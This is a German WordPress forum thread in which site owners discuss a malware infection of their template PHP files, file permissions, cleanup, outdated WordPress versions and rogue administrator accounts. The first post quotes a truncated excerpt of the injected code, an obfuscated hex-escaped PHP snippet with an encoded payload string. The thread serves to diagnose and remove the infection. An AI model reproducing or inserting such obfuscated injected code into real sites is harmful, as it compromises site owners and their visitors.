Malware und Berechtigungen

  • Hallo zusammen

    Seit nun mehr als einem Monat scheinen immer mehr Websites die ich gemacht habe von Malware befallen zu sein.

    Bis jetzt habe ich den Malwarecode nur in den Template Files gefunden. Nun habe ich einpaar Fragen:

    - Was ist die beste oder sicherste Rechtevergabe für Wordpress? Ich nehme an dass die Mutation an den Templates durch die Berechtigung 777 reingekommen ist!?
    - Wie soll ich am besten vorgehen um die Bereinigung durchzuführen?
    - Ist jemand Interessiert mir dabei zu helfen, natürlich zahle ich dafür?
    - Warum erkennt kein Online Malware Scanner diese Files?

    Eine befallene Seite: http://goo.gl/AwdJuP

    Der Code den ich z.B. in der index.php finde ist der folgende (kleiner Auszug):

    PHP
    <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $fnoskvkgpx = 'x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c75ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<!*!+A!>!?>

    Jede PHP Datei vom Template ist befallen.

    Gruss zyclop

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • ...
    - Was ist die beste oder sicherste Rechtevergabe für Wordpress? Ich nehme an dass die Mutation an den Templates durch die Berechtigung 777 reingekommen ist!?
    ...

    Das kann man so pauschal nicht sagen. Es hängt in erster Linie davon ab, wie der Webserver und PHP konfiguriert sind.

    Läuft PHP wie z.B. bei Strato und 1&1 als CGI/FastCGI im Kontext des FTP-Benutzers, bietet auch 755 keinen besseren Schutz gegen Angriffe von außen. Denn auch so hat ein ein Angreifer Schreibrechte auf alle Dateien und Verzeichnisse.

    Aber 777 für Ordner, in denen PHP-Dateien liegen, ob nun Plugins, Themes oder WP selbst, ist keine gute Idee.

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

  • Ich bearbeite ja die Dateien via FTP und da brauche ich ja auch kein 755. Welche Berechtigung würdest du den geben? Resp. was muss ich den Dateien geben damit die Website funktioniert?

    gruss Enrik

  • Damit die Website funktioniert, sind nur Leserechte erforderlich, also für Verzeichnisse 555 und für Dateien 444.

    Wie meinst Du das mit "brauche ich ja auch kein 755"? Wenn Du Dateien per FTP hochlädst, müssen Verzeichnisse und Dateien zumindest für den Eigentümer beschreibbar sein, also 755 bzw. 644.

    Selbst 555 und 444 ist bei Servern, wo PHP im Kontext des Benutzers läuft, nicht sicher, denn ein Angreifer kann sich mit chmod() da auch einfach wieder Schreibrechte geben.

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

  • Hallo zyclop,

    wie sieht es denn inzwischen aus mit deinen Seiten? Hast du eine Lösung gefunden, den Schadcode komplett zu bereinigen und sich vor neuen Infektionen zu schützen? Mir ist dasselbe bei meinen Seiten (8 Stück auf demselben Server) heute aufgefallen. Wie lang die schon infiziert sind, weiß ich nicht.

    Ich habe leider keine Ahnung, wie ich vorgehen soll. Von meinem Webhoster habe ich bisher noch keine Hilfe bekommen. Macht es Sinn, alle infizierten Dateien zu säubern? Theoretisch muss man ja nur die erste Zeile der php Dateien löschen (da könnte doch ein Script für existieren, schließlich sind ja schon tausende Webseiten infiziert worden). Aber wie schützt man sich gegen neue Infektionen? Hat dich dein Ansatz mit den Schreibrechten weiter geführt? Sind deine Seiten sauber?

    Außerdem würde mich noch brennend interessieren, welches Ziel die Hacker verfolgen. Kann es sein, dass mein Rechner infiziert wurde?

    bg finno


  • Mir ist dasselbe bei meinen Seiten (8 Stück auf demselben Server) heute aufgefallen.

    Woher weißt du das bzw. wie hast du das festgestellt?


    Wie lang die schon infiziert sind, weiß ich nicht.

    Nicht so gut, hier ist absolut schnelles handeln angesagt, bevor dich dein Hoster sperrt.


    Ich habe leider keine Ahnung, wie ich vorgehen soll.

    Dann suche dir professionelle Hilfe hier in der Jobbörse


    Von meinem Webhoster habe ich bisher noch keine Hilfe bekommen.

    Free - oder Billighoster ;-)?


    Macht es Sinn, alle infizierten Dateien zu säubern?

    Doofe Frage.


    Theoretisch muss man ja nur die erste Zeile der php Dateien löschen (da könnte doch ein Script für existieren, schließlich sind ja schon tausende Webseiten infiziert worden).

    Nur das Entfernen reicht natürlich nicht, die Sicherheitslücke muss gefunden und beseitigt werden. Sonst postest du das selbe Problem wöchentlich.


    Aber wie schützt man sich gegen neue Infektionen?

    z.B. das man Wordpress, Theme, Plugins immer aktuell hält. Welche Wordpress Version läuft denn bei dir? Lass mich raten, irgend was mit 3.xx ;-)


    Außerdem würde mich noch brennend interessieren, welches Ziel die Hacker verfolgen.

    z.B. Spam versenden, illegale Inhalte auf deinem Server zu lagern usw.


    Kann es sein, dass mein Rechner infiziert wurde?

    Das kann natürlich auch sein.

  • Hallo Hille,

    dankeschön für deine ausführliche Antwort, aber so ganz konstruktiv war das nicht ;)

    Ich hatte hier gepostet, weil ich wissen wollte, was es mit genau diesem speziellen Hack auf sich hat. Und nicht, wie man sich ganz allgemein absichert. Es ist nämlich so, dass davon schon tausende Blocks betroffen sind. Und etliche Quellen berichten davon. Nur leider habe ich noch nichts davon gelesen, wie man die Sicherheitslücke endgültig schließen kann und was der Schadcode eigentlich bewirkt. Deshalb meine Frage an einen, der das alles (hoffentlich) schon hinter sich hat.

    Woher weißt du das bzw. wie hast du das festgestellt?


    In allen php Dateien steht ganz oben eine Zeile nach dem Muster, wie es zyclop in seinem erstem Post beschreibt.

    Nicht so gut, hier ist absolut schnelles handeln angesagt, bevor dich dein Hoster sperrt.


    Wie es aussieht, verbreitet sich der Schadcode selbstständig auf dem Server weiter. Es ist also gut möglich, dass das Einfallstor nicht eine meiner Websites, sondern ein fremder Blog auf demselben Server war. Dafür sollte der Hoster schon Verständnis haben.

    Dann suche dir professionelle Hilfe hier in der Jobbörse


    Klasse, kannst du jedem antworten, der hier im Forum ne Frage stellt. Ich komm drauf zurück, wenn ich alleine nicht mehr weiter komme.

    Free - oder Billighoster ;-)?


    Billighoster :D

    Nur das Entfernen reicht natürlich nicht, die Sicherheitslücke muss gefunden und beseitigt werden. Sonst postest du das selbe Problem wöchentlich.


    Ach nee! Deshalb ja auch meine Frage wie man sich vor neuen Infektionen schützt (ich meinte damit natürlich genau diesen Hack).

    z.B. das man Wordpress, Theme, Plugins immer aktuell hält. Welche Wordpress Version läuft denn bei dir? Lass mich raten, irgend was mit 3.xx ;-)


    Die Version war 4.0 (geh ich gleich nochmal drauf ein).

    z.B. Spam versenden, illegale Inhalte auf deinem Server zu lagern usw.

    Die Info kann ich in 3 Minuten ergooglen. Meinst du dafür mach ich hier einen Post auf? Ich will wissen, was genau dieser Hack bei mir angerichtet hat, bzw auf dem Rechner meiner Leser.

    Inzwischen hat sich auch mein Hoster gemeldet und mir für alle Websites das Backup von vor ca einer Woche eingespielt. Da alles sauber ist, können die Seiten auch noch nicht lange infiziert gewesen sein. Außerdem habe ich vom Webhoster in Erfahrung gebracht, dass ein Wordpress Update die Sicherheitslücke schließt. Ich habe also erstmal alles auf den neuesten Stand gebracht, ein paar andere Vorsichtsmaßnahmen umgesetzt und hoffe, dass die Seiten sauber bleiben.

    vg finno


  • Wie es aussieht, verbreitet sich der Schadcode selbstständig auf dem Server weiter. Es ist also gut möglich, dass das Einfallstor nicht eine meiner Websites, sondern ein fremder Blog auf demselben Server war.

    Nein, außer dein Hoster versteht sein Handwerk nicht.

    Die Version war 4.0 (geh ich gleich nochmal drauf ein).

    Damit hast du evtl. deine Sicherheitlücke schon gefunden.

    http://blog.wpde.org/2014/11/21/sic…ffentlicht.html
    https://wordpress.org/news/2015/04/wordpress-4-2-1/
    https://de.wordpress.org/2015/05/07/wor…rtungs-release/

  • Danke für die Links! Sehr wahrscheinlich, dass dieser Hack jetzt mit dem Update erstmal gebannt ist.

    Im Netz wurde mehrfach berichtet, dass das Einfallstor eine Sicherheitslücke im Plugin Mailpoet war. Es aber angeblich schon ausreicht, wenn ein anderer Blog auf demselben Server das Plugin installiert hat. Und da bei mir gleich alle 6 Websites auf demselben Server betroffen waren - außerdem der Schadcode für den Laien ganz genauso aussah - war ich mir ziemlich sicher, das es bei mir dasselbe Problem sein müsste.

    Aber ich will mich da mal zurückhalten mit Vermutungen. Natürlich kann es auch sein, dass eine meiner Seiten gehackt wurde und dann die Login Daten auf allen anderen Seiten des Servers mit Erfolg ausprobiert wurden (ich hatte bis gestern überall dasselbe PW, natürlich in Kombination mit dem Username "admin" :)).

    Was übrigens noch auffällig war - es wurden auf allen Seiten ca 10 neue Benutzer mit Administrator Rechten angelegt (admin84, administrator, root,...).

    bg

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!